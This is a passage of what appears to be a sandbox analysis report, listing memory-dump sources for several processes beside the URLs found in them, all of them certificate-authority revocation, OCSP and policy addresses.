0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-ocsp.ws.symantec.com04
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                  Source: explorer.exe, 00000012.00000002.3689356192.0000000006114000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.ss2.us/
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: explorer.exe, 00000012.00000003.2509158293.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                  Source: explorer.exe, 00000012.00000003.2509878305.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509158293.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                  Source: explorer.exe, 00000012.00000003.2509427775.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                  Source: Server.exe, 0000000C.00000002.2396557109.000000000B36A000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470851916.00000000047A9000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461023555.000000000B21B000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2483054416.0000000004416000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3676999259.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203A(1).crl
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203A(1).crt0u
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0l
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                  Source: explorer.exe, 00000012.00000002.3693450265.0000000026707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, 